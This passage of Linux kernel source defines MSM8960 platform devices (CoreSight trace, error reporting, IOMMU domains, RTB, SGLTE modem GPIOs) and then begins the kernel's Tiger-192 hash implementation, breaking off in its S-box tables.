.num_resources = ARRAY_SIZE(coresight_funnel_resources),
.resource = coresight_funnel_resources,
.dev = {
.platform_data = &coresight_funnel_pdata,
},
};
/* CoreSight STM (software trace source): 4K register page plus a 1.5MB
 * stimulus/channel region; its single outport feeds the funnel (id 2)
 * on funnel port 2. */
static struct resource coresight_stm_resources[] = {
{
.start = CORESIGHT_STM_PHYS_BASE,
.end = CORESIGHT_STM_PHYS_BASE + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
{
.start = CORESIGHT_STM_CHANNEL_PHYS_BASE,
.end = CORESIGHT_STM_CHANNEL_PHYS_BASE + SZ_1M + SZ_512K - 1,
.flags = IORESOURCE_MEM,
},
};
static const int coresight_stm_outports[] = { 0 };
static const int coresight_stm_child_ids[] = { 2 };
static const int coresight_stm_child_ports[] = { 2 };
static struct coresight_platform_data coresight_stm_pdata = {
.id = 3,
.name = "coresight-stm",
.nr_inports = 0,
.outports = coresight_stm_outports,
.child_ids = coresight_stm_child_ids,
.child_ports = coresight_stm_child_ports,
.nr_outports = ARRAY_SIZE(coresight_stm_outports),
};
struct platform_device coresight_stm_device = {
.name = "coresight-stm",
.id = 0,
.num_resources = ARRAY_SIZE(coresight_stm_resources),
.resource = coresight_stm_resources,
.dev = {
.platform_data = &coresight_stm_pdata,
},
};
/* CoreSight ETM for CPU0 (trace source): feeds the funnel (id 2) on
 * funnel port 0. */
static struct resource coresight_etm0_resources[] = {
{
.start = CORESIGHT_ETM0_PHYS_BASE,
.end = CORESIGHT_ETM0_PHYS_BASE + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
};
static const int coresight_etm0_outports[] = { 0 };
static const int coresight_etm0_child_ids[] = { 2 };
static const int coresight_etm0_child_ports[] = { 0 };
static struct coresight_platform_data coresight_etm0_pdata = {
.id = 4,
.name = "coresight-etm0",
.nr_inports = 0,
.outports = coresight_etm0_outports,
.child_ids = coresight_etm0_child_ids,
.child_ports = coresight_etm0_child_ports,
.nr_outports = ARRAY_SIZE(coresight_etm0_outports),
};
struct platform_device coresight_etm0_device = {
.name = "coresight-etm",
.id = 0,
.num_resources = ARRAY_SIZE(coresight_etm0_resources),
.resource = coresight_etm0_resources,
.dev = {
.platform_data = &coresight_etm0_pdata,
},
};
/* CoreSight ETM for CPU1 (trace source): feeds the funnel (id 2) on
 * funnel port 1. */
static struct resource coresight_etm1_resources[] = {
{
.start = CORESIGHT_ETM1_PHYS_BASE,
.end = CORESIGHT_ETM1_PHYS_BASE + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
};
static const int coresight_etm1_outports[] = { 0 };
static const int coresight_etm1_child_ids[] = { 2 };
static const int coresight_etm1_child_ports[] = { 1 };
static struct coresight_platform_data coresight_etm1_pdata = {
.id = 5,
.name = "coresight-etm1",
.nr_inports = 0,
.outports = coresight_etm1_outports,
.child_ids = coresight_etm1_child_ids,
.child_ports = coresight_etm1_child_ports,
.nr_outports = ARRAY_SIZE(coresight_etm1_outports),
};
struct platform_device coresight_etm1_device = {
.name = "coresight-etm",
.id = 1,
.num_resources = ARRAY_SIZE(coresight_etm1_resources),
.resource = coresight_etm1_resources,
.dev = {
.platform_data = &coresight_etm1_pdata,
},
};
/* EBI1 DDR error-reporting devices, one per memory channel: each gets its
 * channel's error IRQ and a 4K register window. */
static struct resource msm_ebi1_ch0_erp_resources[] = {
{
.start = HSDDRX_EBI1CH0_IRQ,
.flags = IORESOURCE_IRQ,
},
{
.start = 0x00A40000,
.end = 0x00A40000 + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
};
struct platform_device msm8960_device_ebi1_ch0_erp = {
.name = "msm_ebi_erp",
.id = 0,
.num_resources = ARRAY_SIZE(msm_ebi1_ch0_erp_resources),
.resource = msm_ebi1_ch0_erp_resources,
};
static struct resource msm_ebi1_ch1_erp_resources[] = {
{
.start = HSDDRX_EBI1CH1_IRQ,
.flags = IORESOURCE_IRQ,
},
{
.start = 0x00D40000,
.end = 0x00D40000 + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
};
struct platform_device msm8960_device_ebi1_ch1_erp = {
.name = "msm_ebi_erp",
.id = 1,
.num_resources = ARRAY_SIZE(msm_ebi1_ch1_erp_resources),
.resource = msm_ebi1_ch1_erp_resources,
};
/* CPU cache error-reporting device: L1 and L2 cache-error interrupt
 * lines, identified by resource name. */
static struct resource msm_cache_erp_resources[] = {
{
.name = "l1_irq",
.start = SC_SICCPUXEXTFAULTIRPTREQ,
.flags = IORESOURCE_IRQ,
},
{
.name = "l2_irq",
.start = APCC_QGICL2IRPTREQ,
.flags = IORESOURCE_IRQ,
}
};
struct platform_device msm8960_device_cache_erp = {
.name = "msm_cache_erp",
.id = -1,
.num_resources = ARRAY_SIZE(msm_cache_erp_resources),
.resource = msm_cache_erp_resources,
};
/* Mapping of IOMMU context-bank names to the IOVA domain each should be
 * attached to (camera, rotator, video). */
struct msm_iommu_domain_name msm8960_iommu_ctx_names[] = {
/* Camera */
{
.name = "ijpeg_src",
.domain = CAMERA_DOMAIN,
},
/* Camera */
{
.name = "ijpeg_dst",
.domain = CAMERA_DOMAIN,
},
/* Camera */
{
.name = "jpegd_src",
.domain = CAMERA_DOMAIN,
},
/* Camera */
{
.name = "jpegd_dst",
.domain = CAMERA_DOMAIN,
},
/* Rotator */
{
.name = "rot_src",
.domain = ROTATOR_SRC_DOMAIN,
},
/* Rotator */
/* NOTE(review): rot_dst also maps to ROTATOR_SRC_DOMAIN (no separate
 * dst domain is defined here) — presumably intentional; verify. */
{
.name = "rot_dst",
.domain = ROTATOR_SRC_DOMAIN,
},
/* Video */
{
.name = "vcodec_a_mm1",
.domain = VIDEO_DOMAIN,
},
/* Video */
{
.name = "vcodec_b_mm2",
.domain = VIDEO_DOMAIN,
},
/* Video */
{
.name = "vcodec_a_stream",
.domain = VIDEO_DOMAIN,
},
};
/* IOVA address pools for each IOMMU domain.  All pools start above 0 so
 * that IOVA 0 is never handed out. */
static struct mem_pool msm8960_video_pools[] = {
/*
 * Video hardware has the following requirements:
 * 1. All video addresses used by the video hardware must be at a higher
 * address than video firmware address.
 * 2. Video hardware can only access a range of 256MB from the base of
 * the video firmware.
 */
[VIDEO_FIRMWARE_POOL] =
/* Low addresses, intended for video firmware */
{
.paddr = SZ_128K,
.size = SZ_16M - SZ_128K,
},
[VIDEO_MAIN_POOL] =
/* Main video pool */
{
.paddr = SZ_16M,
.size = SZ_256M - SZ_16M,
},
[GEN_POOL] =
/* Remaining address space up to 2G */
{
.paddr = SZ_256M,
.size = SZ_2G - SZ_256M,
},
};
static struct mem_pool msm8960_camera_pools[] = {
[GEN_POOL] =
/* One address space for camera */
{
.paddr = SZ_128K,
.size = SZ_2G - SZ_128K,
},
};
static struct mem_pool msm8960_display_read_pools[] = {
[GEN_POOL] =
/* One address space for display reads */
{
.paddr = SZ_128K,
.size = SZ_2G - SZ_128K,
},
};
static struct mem_pool msm8960_rotator_src_pools[] = {
[GEN_POOL] =
/* One address space for rotator src */
{
.paddr = SZ_128K,
.size = SZ_2G - SZ_128K,
},
};
/* IOMMU domain table (one entry per domain, indexed by domain id), the
 * pdata bundling domains with the context-name table above, and the
 * "iommu_domains" platform device that publishes it. */
static struct msm_iommu_domain msm8960_iommu_domains[] = {
[VIDEO_DOMAIN] = {
.iova_pools = msm8960_video_pools,
.npools = ARRAY_SIZE(msm8960_video_pools),
},
[CAMERA_DOMAIN] = {
.iova_pools = msm8960_camera_pools,
.npools = ARRAY_SIZE(msm8960_camera_pools),
},
[DISPLAY_READ_DOMAIN] = {
.iova_pools = msm8960_display_read_pools,
.npools = ARRAY_SIZE(msm8960_display_read_pools),
},
[ROTATOR_SRC_DOMAIN] = {
.iova_pools = msm8960_rotator_src_pools,
.npools = ARRAY_SIZE(msm8960_rotator_src_pools),
},
};
struct iommu_domains_pdata msm8960_iommu_domain_pdata = {
.domains = msm8960_iommu_domains,
.ndomains = ARRAY_SIZE(msm8960_iommu_domains),
.domain_names = msm8960_iommu_ctx_names,
.nnames = ARRAY_SIZE(msm8960_iommu_ctx_names),
.domain_alloc_flags = 0,
};
struct platform_device msm8960_iommu_domain_device = {
.name = "iommu_domains",
.id = -1,
.dev = {
.platform_data = &msm8960_iommu_domain_pdata,
}
};
/* Register Trace Buffer platform data; default buffer size is 1MB and may
 * be overridden by the "msm_rtb_size" command-line parameter below. */
struct msm_rtb_platform_data msm8960_rtb_pdata = {
.size = SZ_1M,
};
/*
 * Early-boot handler for the "msm_rtb_size" kernel command-line parameter:
 * parses a human-readable size (memparse accepts k/m/g suffixes), rounds
 * it up to a 4K multiple and overrides msm8960_rtb_pdata.size.
 * Returns 0 (early_param convention for "option consumed").
 */
static int __init msm_rtb_set_buffer_size(char *p)
{
	unsigned long long s;

	/* memparse() returns unsigned long long; the original stored it in
	 * an int, which could truncate or go negative for large values. */
	s = memparse(p, NULL);
	msm8960_rtb_pdata.size = ALIGN(s, SZ_4K);
	return 0;
}
early_param("msm_rtb_size", msm_rtb_set_buffer_size);
/* Register Trace Buffer platform device. */
struct platform_device msm8960_rtb_device = {
.name = "msm_rtb",
.id = -1,
.dev = {
.platform_data = &msm8960_rtb_pdata,
},
};
#define MSM_8960_L1_SIZE SZ_1M
/*
* The actual L2 size is smaller but we need a larger buffer
* size to store other dump information
*/
#define MSM_8960_L2_SIZE SZ_4M
/* Cache-dump buffer sizes (L2 buffer is oversized on purpose, see the
 * comment on MSM_8960_L2_SIZE above) and the device that uses them. */
struct msm_cache_dump_platform_data msm8960_cache_dump_pdata = {
.l2_size = MSM_8960_L2_SIZE,
.l1_size = MSM_8960_L1_SIZE,
};
struct platform_device msm8960_cache_dump_device = {
.name = "msm_cache_dump",
.id = -1,
.dev = {
.platform_data = &msm8960_cache_dump_pdata,
},
};
#define MDM2AP_ERRFATAL 40
#define AP2MDM_ERRFATAL 80
#define MDM2AP_STATUS 24
#define AP2MDM_STATUS 77
#define AP2MDM_PMIC_PWR_EN 22
#define AP2MDM_KPDPWR_N 79
#define AP2MDM_SOFT_RESET 78
#define USB_SW 25
/* GPIO lines used to control/monitor the external SGLTE modem, exported
 * as named IORESOURCE_IO resources (GPIO numbers from the defines above). */
static struct resource sglte_resources[] = {
{
.start = MDM2AP_ERRFATAL,
.end = MDM2AP_ERRFATAL,
.name = "MDM2AP_ERRFATAL",
.flags = IORESOURCE_IO,
},
{
.start = AP2MDM_ERRFATAL,
.end = AP2MDM_ERRFATAL,
.name = "AP2MDM_ERRFATAL",
.flags = IORESOURCE_IO,
},
{
.start = MDM2AP_STATUS,
.end = MDM2AP_STATUS,
.name = "MDM2AP_STATUS",
.flags = IORESOURCE_IO,
},
{
.start = AP2MDM_STATUS,
.end = AP2MDM_STATUS,
.name = "AP2MDM_STATUS",
.flags = IORESOURCE_IO,
},
{
.start = AP2MDM_PMIC_PWR_EN,
.end = AP2MDM_PMIC_PWR_EN,
.name = "AP2MDM_PMIC_PWR_EN",
.flags = IORESOURCE_IO,
},
{
.start = AP2MDM_KPDPWR_N,
.end = AP2MDM_KPDPWR_N,
.name = "AP2MDM_KPDPWR_N",
.flags = IORESOURCE_IO,
},
{
.start = AP2MDM_SOFT_RESET,
.end = AP2MDM_SOFT_RESET,
.name = "AP2MDM_SOFT_RESET",
.flags = IORESOURCE_IO,
},
{
.start = USB_SW,
.end = USB_SW,
.name = "USB_SW",
.flags = IORESOURCE_IO,
},
};
/* GPIO controller device and the SGLTE modem device that consumes the
 * GPIO resources above. */
struct platform_device msm_gpio_device = {
.name = "msmgpio",
.id = -1,
};
struct platform_device mdm_sglte_device = {
.name = "mdm2_modem",
.id = -1,
.num_resources = ARRAY_SIZE(sglte_resources),
.resource = sglte_resources,
};
/* Device list registered by msm8960_add_vidc_device() below. */
struct platform_device *msm8960_vidc_device[] __initdata = {
&msm_device_vidc
};
/*
 * Register the video codec platform device(s).  On MSM8960AB parts the
 * codec's bus-scaling client data is swapped for vidc_pro_bus_client_data
 * before registration.
 */
void __init msm8960_add_vidc_device(void)
{
	if (cpu_is_msm8960ab()) {
		struct msm_vidc_platform_data *pdata;

		/* platform_data is void *; the explicit cast the original
		 * carried is unnecessary in C. */
		pdata = msm_device_vidc.dev.platform_data;
		pdata->vidc_bus_client_pdata = &vidc_pro_bus_client_data;
	}
	platform_add_devices(msm8960_vidc_device,
				ARRAY_SIZE(msm8960_vidc_device));
}
| gpl-2.0 |
JustAkan/jolla-kernel_GK-GPRO_Gen3 | crypto/tgr192.c | 4 | 31600 | /*
* Cryptographic API.
*
* Tiger hashing Algorithm
*
* Copyright (C) 1998 Free Software Foundation, Inc.
*
* The Tiger algorithm was developed by Ross Anderson and Eli Biham.
* It was optimized for 64-bit processors while still delievering
* decent performance on 32 and 16-bit processors.
*
* This version is derived from the GnuPG implementation and the
* Tiger-Perl interface written by Rafael Sevilla
*
* Adapted for Linux Kernel Crypto by Aaron Grothe
* ajgrothe@yahoo.com, February 22, 2005
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
*/
#include <crypto/internal/hash.h>
#include <linux/init.h>
#include <linux/module.h>
#include <linux/mm.h>
#include <asm/byteorder.h>
#include <linux/types.h>
#define TGR192_DIGEST_SIZE 24
#define TGR160_DIGEST_SIZE 20
#define TGR128_DIGEST_SIZE 16
#define TGR192_BLOCK_SIZE 64
/*
 * Tiger-192 hash state: the 192-bit chaining value (a, b, c), a 64-byte
 * buffer for a partial input block, the number of bytes currently held in
 * that buffer (count) and the number of full blocks processed (nblocks).
 */
struct tgr192_ctx {
u64 a, b, c;
u8 hash[64];
int count;
u32 nblocks;
};
/* Tiger S-box 1: 256 precomputed 64-bit constants used by the Tiger round
 * function.  Generated table from the reference implementation — do not
 * edit by hand. */
static const u64 sbox1[256] = {
0x02aab17cf7e90c5eULL, 0xac424b03e243a8ecULL, 0x72cd5be30dd5fcd3ULL,
0x6d019b93f6f97f3aULL, 0xcd9978ffd21f9193ULL, 0x7573a1c9708029e2ULL,
0xb164326b922a83c3ULL, 0x46883eee04915870ULL, 0xeaace3057103ece6ULL,
0xc54169b808a3535cULL, 0x4ce754918ddec47cULL, 0x0aa2f4dfdc0df40cULL,
0x10b76f18a74dbefaULL, 0xc6ccb6235ad1ab6aULL, 0x13726121572fe2ffULL,
0x1a488c6f199d921eULL, 0x4bc9f9f4da0007caULL, 0x26f5e6f6e85241c7ULL,
0x859079dbea5947b6ULL, 0x4f1885c5c99e8c92ULL, 0xd78e761ea96f864bULL,
0x8e36428c52b5c17dULL, 0x69cf6827373063c1ULL, 0xb607c93d9bb4c56eULL,
0x7d820e760e76b5eaULL, 0x645c9cc6f07fdc42ULL, 0xbf38a078243342e0ULL,
0x5f6b343c9d2e7d04ULL, 0xf2c28aeb600b0ec6ULL, 0x6c0ed85f7254bcacULL,
0x71592281a4db4fe5ULL, 0x1967fa69ce0fed9fULL, 0xfd5293f8b96545dbULL,
0xc879e9d7f2a7600bULL, 0x860248920193194eULL, 0xa4f9533b2d9cc0b3ULL,
0x9053836c15957613ULL, 0xdb6dcf8afc357bf1ULL, 0x18beea7a7a370f57ULL,
0x037117ca50b99066ULL, 0x6ab30a9774424a35ULL, 0xf4e92f02e325249bULL,
0x7739db07061ccae1ULL, 0xd8f3b49ceca42a05ULL, 0xbd56be3f51382f73ULL,
0x45faed5843b0bb28ULL, 0x1c813d5c11bf1f83ULL, 0x8af0e4b6d75fa169ULL,
0x33ee18a487ad9999ULL, 0x3c26e8eab1c94410ULL, 0xb510102bc0a822f9ULL,
0x141eef310ce6123bULL, 0xfc65b90059ddb154ULL, 0xe0158640c5e0e607ULL,
0x884e079826c3a3cfULL, 0x930d0d9523c535fdULL, 0x35638d754e9a2b00ULL,
0x4085fccf40469dd5ULL, 0xc4b17ad28be23a4cULL, 0xcab2f0fc6a3e6a2eULL,
0x2860971a6b943fcdULL, 0x3dde6ee212e30446ULL, 0x6222f32ae01765aeULL,
0x5d550bb5478308feULL, 0xa9efa98da0eda22aULL, 0xc351a71686c40da7ULL,
0x1105586d9c867c84ULL, 0xdcffee85fda22853ULL, 0xccfbd0262c5eef76ULL,
0xbaf294cb8990d201ULL, 0xe69464f52afad975ULL, 0x94b013afdf133e14ULL,
0x06a7d1a32823c958ULL, 0x6f95fe5130f61119ULL, 0xd92ab34e462c06c0ULL,
0xed7bde33887c71d2ULL, 0x79746d6e6518393eULL, 0x5ba419385d713329ULL,
0x7c1ba6b948a97564ULL, 0x31987c197bfdac67ULL, 0xde6c23c44b053d02ULL,
0x581c49fed002d64dULL, 0xdd474d6338261571ULL, 0xaa4546c3e473d062ULL,
0x928fce349455f860ULL, 0x48161bbacaab94d9ULL, 0x63912430770e6f68ULL,
0x6ec8a5e602c6641cULL, 0x87282515337ddd2bULL, 0x2cda6b42034b701bULL,
0xb03d37c181cb096dULL, 0xe108438266c71c6fULL, 0x2b3180c7eb51b255ULL,
0xdf92b82f96c08bbcULL, 0x5c68c8c0a632f3baULL, 0x5504cc861c3d0556ULL,
0xabbfa4e55fb26b8fULL, 0x41848b0ab3baceb4ULL, 0xb334a273aa445d32ULL,
0xbca696f0a85ad881ULL, 0x24f6ec65b528d56cULL, 0x0ce1512e90f4524aULL,
0x4e9dd79d5506d35aULL, 0x258905fac6ce9779ULL, 0x2019295b3e109b33ULL,
0xf8a9478b73a054ccULL, 0x2924f2f934417eb0ULL, 0x3993357d536d1bc4ULL,
0x38a81ac21db6ff8bULL, 0x47c4fbf17d6016bfULL, 0x1e0faadd7667e3f5ULL,
0x7abcff62938beb96ULL, 0xa78dad948fc179c9ULL, 0x8f1f98b72911e50dULL,
0x61e48eae27121a91ULL, 0x4d62f7ad31859808ULL, 0xeceba345ef5ceaebULL,
0xf5ceb25ebc9684ceULL, 0xf633e20cb7f76221ULL, 0xa32cdf06ab8293e4ULL,
0x985a202ca5ee2ca4ULL, 0xcf0b8447cc8a8fb1ULL, 0x9f765244979859a3ULL,
0xa8d516b1a1240017ULL, 0x0bd7ba3ebb5dc726ULL, 0xe54bca55b86adb39ULL,
0x1d7a3afd6c478063ULL, 0x519ec608e7669eddULL, 0x0e5715a2d149aa23ULL,
0x177d4571848ff194ULL, 0xeeb55f3241014c22ULL, 0x0f5e5ca13a6e2ec2ULL,
0x8029927b75f5c361ULL, 0xad139fabc3d6e436ULL, 0x0d5df1a94ccf402fULL,
0x3e8bd948bea5dfc8ULL, 0xa5a0d357bd3ff77eULL, 0xa2d12e251f74f645ULL,
0x66fd9e525e81a082ULL, 0x2e0c90ce7f687a49ULL, 0xc2e8bcbeba973bc5ULL,
0x000001bce509745fULL, 0x423777bbe6dab3d6ULL, 0xd1661c7eaef06eb5ULL,
0xa1781f354daacfd8ULL, 0x2d11284a2b16affcULL, 0xf1fc4f67fa891d1fULL,
0x73ecc25dcb920adaULL, 0xae610c22c2a12651ULL, 0x96e0a810d356b78aULL,
0x5a9a381f2fe7870fULL, 0xd5ad62ede94e5530ULL, 0xd225e5e8368d1427ULL,
0x65977b70c7af4631ULL, 0x99f889b2de39d74fULL, 0x233f30bf54e1d143ULL,
0x9a9675d3d9a63c97ULL, 0x5470554ff334f9a8ULL, 0x166acb744a4f5688ULL,
0x70c74caab2e4aeadULL, 0xf0d091646f294d12ULL, 0x57b82a89684031d1ULL,
0xefd95a5a61be0b6bULL, 0x2fbd12e969f2f29aULL, 0x9bd37013feff9fe8ULL,
0x3f9b0404d6085a06ULL, 0x4940c1f3166cfe15ULL, 0x09542c4dcdf3defbULL,
0xb4c5218385cd5ce3ULL, 0xc935b7dc4462a641ULL, 0x3417f8a68ed3b63fULL,
0xb80959295b215b40ULL, 0xf99cdaef3b8c8572ULL, 0x018c0614f8fcb95dULL,
0x1b14accd1a3acdf3ULL, 0x84d471f200bb732dULL, 0xc1a3110e95e8da16ULL,
0x430a7220bf1a82b8ULL, 0xb77e090d39df210eULL, 0x5ef4bd9f3cd05e9dULL,
0x9d4ff6da7e57a444ULL, 0xda1d60e183d4a5f8ULL, 0xb287c38417998e47ULL,
0xfe3edc121bb31886ULL, 0xc7fe3ccc980ccbefULL, 0xe46fb590189bfd03ULL,
0x3732fd469a4c57dcULL, 0x7ef700a07cf1ad65ULL, 0x59c64468a31d8859ULL,
0x762fb0b4d45b61f6ULL, 0x155baed099047718ULL, 0x68755e4c3d50baa6ULL,
0xe9214e7f22d8b4dfULL, 0x2addbf532eac95f4ULL, 0x32ae3909b4bd0109ULL,
0x834df537b08e3450ULL, 0xfa209da84220728dULL, 0x9e691d9b9efe23f7ULL,
0x0446d288c4ae8d7fULL, 0x7b4cc524e169785bULL, 0x21d87f0135ca1385ULL,
0xcebb400f137b8aa5ULL, 0x272e2b66580796beULL, 0x3612264125c2b0deULL,
0x057702bdad1efbb2ULL, 0xd4babb8eacf84be9ULL, 0x91583139641bc67bULL,
0x8bdc2de08036e024ULL, 0x603c8156f49f68edULL, 0xf7d236f7dbef5111ULL,
0x9727c4598ad21e80ULL, 0xa08a0896670a5fd7ULL, 0xcb4a8f4309eba9cbULL,
0x81af564b0f7036a1ULL, 0xc0b99aa778199abdULL, 0x959f1ec83fc8e952ULL,
0x8c505077794a81b9ULL, 0x3acaaf8f056338f0ULL, 0x07b43f50627a6778ULL,
0x4a44ab49f5eccc77ULL, 0x3bc3d6e4b679ee98ULL, 0x9cc0d4d1cf14108cULL,
0x4406c00b206bc8a0ULL, 0x82a18854c8d72d89ULL, 0x67e366b35c3c432cULL,
0xb923dd61102b37f2ULL, 0x56ab2779d884271dULL, 0xbe83e1b0ff1525afULL,
0xfb7c65d4217e49a9ULL, 0x6bdbe0e76d48e7d4ULL, 0x08df828745d9179eULL,
0x22ea6a9add53bd34ULL, 0xe36e141c5622200aULL, 0x7f805d1b8cb750eeULL,
0xafe5c7a59f58e837ULL, 0xe27f996a4fb1c23cULL, 0xd3867dfb0775f0d0ULL,
0xd0e673de6e88891aULL, 0x123aeb9eafb86c25ULL, 0x30f1d5d5c145b895ULL,
0xbb434a2dee7269e7ULL, 0x78cb67ecf931fa38ULL, 0xf33b0372323bbf9cULL,
0x52d66336fb279c74ULL, 0x505f33ac0afb4eaaULL, 0xe8a5cd99a2cce187ULL,
0x534974801e2d30bbULL, 0x8d2d5711d5876d90ULL, 0x1f1a412891bc038eULL,
0xd6e2e71d82e56648ULL, 0x74036c3a497732b7ULL, 0x89b67ed96361f5abULL,
0xffed95d8f1ea02a2ULL, 0xe72b3bd61464d43dULL, 0xa6300f170bdc4820ULL,
0xebc18760ed78a77aULL
};
/* sbox2: second of the four fixed 256-entry 64-bit Tiger S-boxes. */
static const u64 sbox2[256] = {
0xe6a6be5a05a12138ULL, 0xb5a122a5b4f87c98ULL, 0x563c6089140b6990ULL,
0x4c46cb2e391f5dd5ULL, 0xd932addbc9b79434ULL, 0x08ea70e42015aff5ULL,
0xd765a6673e478cf1ULL, 0xc4fb757eab278d99ULL, 0xdf11c6862d6e0692ULL,
0xddeb84f10d7f3b16ULL, 0x6f2ef604a665ea04ULL, 0x4a8e0f0ff0e0dfb3ULL,
0xa5edeef83dbcba51ULL, 0xfc4f0a2a0ea4371eULL, 0xe83e1da85cb38429ULL,
0xdc8ff882ba1b1ce2ULL, 0xcd45505e8353e80dULL, 0x18d19a00d4db0717ULL,
0x34a0cfeda5f38101ULL, 0x0be77e518887caf2ULL, 0x1e341438b3c45136ULL,
0xe05797f49089ccf9ULL, 0xffd23f9df2591d14ULL, 0x543dda228595c5cdULL,
0x661f81fd99052a33ULL, 0x8736e641db0f7b76ULL, 0x15227725418e5307ULL,
0xe25f7f46162eb2faULL, 0x48a8b2126c13d9feULL, 0xafdc541792e76eeaULL,
0x03d912bfc6d1898fULL, 0x31b1aafa1b83f51bULL, 0xf1ac2796e42ab7d9ULL,
0x40a3a7d7fcd2ebacULL, 0x1056136d0afbbcc5ULL, 0x7889e1dd9a6d0c85ULL,
0xd33525782a7974aaULL, 0xa7e25d09078ac09bULL, 0xbd4138b3eac6edd0ULL,
0x920abfbe71eb9e70ULL, 0xa2a5d0f54fc2625cULL, 0xc054e36b0b1290a3ULL,
0xf6dd59ff62fe932bULL, 0x3537354511a8ac7dULL, 0xca845e9172fadcd4ULL,
0x84f82b60329d20dcULL, 0x79c62ce1cd672f18ULL, 0x8b09a2add124642cULL,
0xd0c1e96a19d9e726ULL, 0x5a786a9b4ba9500cULL, 0x0e020336634c43f3ULL,
0xc17b474aeb66d822ULL, 0x6a731ae3ec9baac2ULL, 0x8226667ae0840258ULL,
0x67d4567691caeca5ULL, 0x1d94155c4875adb5ULL, 0x6d00fd985b813fdfULL,
0x51286efcb774cd06ULL, 0x5e8834471fa744afULL, 0xf72ca0aee761ae2eULL,
0xbe40e4cdaee8e09aULL, 0xe9970bbb5118f665ULL, 0x726e4beb33df1964ULL,
0x703b000729199762ULL, 0x4631d816f5ef30a7ULL, 0xb880b5b51504a6beULL,
0x641793c37ed84b6cULL, 0x7b21ed77f6e97d96ULL, 0x776306312ef96b73ULL,
0xae528948e86ff3f4ULL, 0x53dbd7f286a3f8f8ULL, 0x16cadce74cfc1063ULL,
0x005c19bdfa52c6ddULL, 0x68868f5d64d46ad3ULL, 0x3a9d512ccf1e186aULL,
0x367e62c2385660aeULL, 0xe359e7ea77dcb1d7ULL, 0x526c0773749abe6eULL,
0x735ae5f9d09f734bULL, 0x493fc7cc8a558ba8ULL, 0xb0b9c1533041ab45ULL,
0x321958ba470a59bdULL, 0x852db00b5f46c393ULL, 0x91209b2bd336b0e5ULL,
0x6e604f7d659ef19fULL, 0xb99a8ae2782ccb24ULL, 0xccf52ab6c814c4c7ULL,
0x4727d9afbe11727bULL, 0x7e950d0c0121b34dULL, 0x756f435670ad471fULL,
0xf5add442615a6849ULL, 0x4e87e09980b9957aULL, 0x2acfa1df50aee355ULL,
0xd898263afd2fd556ULL, 0xc8f4924dd80c8fd6ULL, 0xcf99ca3d754a173aULL,
0xfe477bacaf91bf3cULL, 0xed5371f6d690c12dULL, 0x831a5c285e687094ULL,
0xc5d3c90a3708a0a4ULL, 0x0f7f903717d06580ULL, 0x19f9bb13b8fdf27fULL,
0xb1bd6f1b4d502843ULL, 0x1c761ba38fff4012ULL, 0x0d1530c4e2e21f3bULL,
0x8943ce69a7372c8aULL, 0xe5184e11feb5ce66ULL, 0x618bdb80bd736621ULL,
0x7d29bad68b574d0bULL, 0x81bb613e25e6fe5bULL, 0x071c9c10bc07913fULL,
0xc7beeb7909ac2d97ULL, 0xc3e58d353bc5d757ULL, 0xeb017892f38f61e8ULL,
0xd4effb9c9b1cc21aULL, 0x99727d26f494f7abULL, 0xa3e063a2956b3e03ULL,
0x9d4a8b9a4aa09c30ULL, 0x3f6ab7d500090fb4ULL, 0x9cc0f2a057268ac0ULL,
0x3dee9d2dedbf42d1ULL, 0x330f49c87960a972ULL, 0xc6b2720287421b41ULL,
0x0ac59ec07c00369cULL, 0xef4eac49cb353425ULL, 0xf450244eef0129d8ULL,
0x8acc46e5caf4deb6ULL, 0x2ffeab63989263f7ULL, 0x8f7cb9fe5d7a4578ULL,
0x5bd8f7644e634635ULL, 0x427a7315bf2dc900ULL, 0x17d0c4aa2125261cULL,
0x3992486c93518e50ULL, 0xb4cbfee0a2d7d4c3ULL, 0x7c75d6202c5ddd8dULL,
0xdbc295d8e35b6c61ULL, 0x60b369d302032b19ULL, 0xce42685fdce44132ULL,
0x06f3ddb9ddf65610ULL, 0x8ea4d21db5e148f0ULL, 0x20b0fce62fcd496fULL,
0x2c1b912358b0ee31ULL, 0xb28317b818f5a308ULL, 0xa89c1e189ca6d2cfULL,
0x0c6b18576aaadbc8ULL, 0xb65deaa91299fae3ULL, 0xfb2b794b7f1027e7ULL,
0x04e4317f443b5bebULL, 0x4b852d325939d0a6ULL, 0xd5ae6beefb207ffcULL,
0x309682b281c7d374ULL, 0xbae309a194c3b475ULL, 0x8cc3f97b13b49f05ULL,
0x98a9422ff8293967ULL, 0x244b16b01076ff7cULL, 0xf8bf571c663d67eeULL,
0x1f0d6758eee30da1ULL, 0xc9b611d97adeb9b7ULL, 0xb7afd5887b6c57a2ULL,
0x6290ae846b984fe1ULL, 0x94df4cdeacc1a5fdULL, 0x058a5bd1c5483affULL,
0x63166cc142ba3c37ULL, 0x8db8526eb2f76f40ULL, 0xe10880036f0d6d4eULL,
0x9e0523c9971d311dULL, 0x45ec2824cc7cd691ULL, 0x575b8359e62382c9ULL,
0xfa9e400dc4889995ULL, 0xd1823ecb45721568ULL, 0xdafd983b8206082fULL,
0xaa7d29082386a8cbULL, 0x269fcd4403b87588ULL, 0x1b91f5f728bdd1e0ULL,
0xe4669f39040201f6ULL, 0x7a1d7c218cf04adeULL, 0x65623c29d79ce5ceULL,
0x2368449096c00bb1ULL, 0xab9bf1879da503baULL, 0xbc23ecb1a458058eULL,
0x9a58df01bb401eccULL, 0xa070e868a85f143dULL, 0x4ff188307df2239eULL,
0x14d565b41a641183ULL, 0xee13337452701602ULL, 0x950e3dcf3f285e09ULL,
0x59930254b9c80953ULL, 0x3bf299408930da6dULL, 0xa955943f53691387ULL,
0xa15edecaa9cb8784ULL, 0x29142127352be9a0ULL, 0x76f0371fff4e7afbULL,
0x0239f450274f2228ULL, 0xbb073af01d5e868bULL, 0xbfc80571c10e96c1ULL,
0xd267088568222e23ULL, 0x9671a3d48e80b5b0ULL, 0x55b5d38ae193bb81ULL,
0x693ae2d0a18b04b8ULL, 0x5c48b4ecadd5335fULL, 0xfd743b194916a1caULL,
0x2577018134be98c4ULL, 0xe77987e83c54a4adULL, 0x28e11014da33e1b9ULL,
0x270cc59e226aa213ULL, 0x71495f756d1a5f60ULL, 0x9be853fb60afef77ULL,
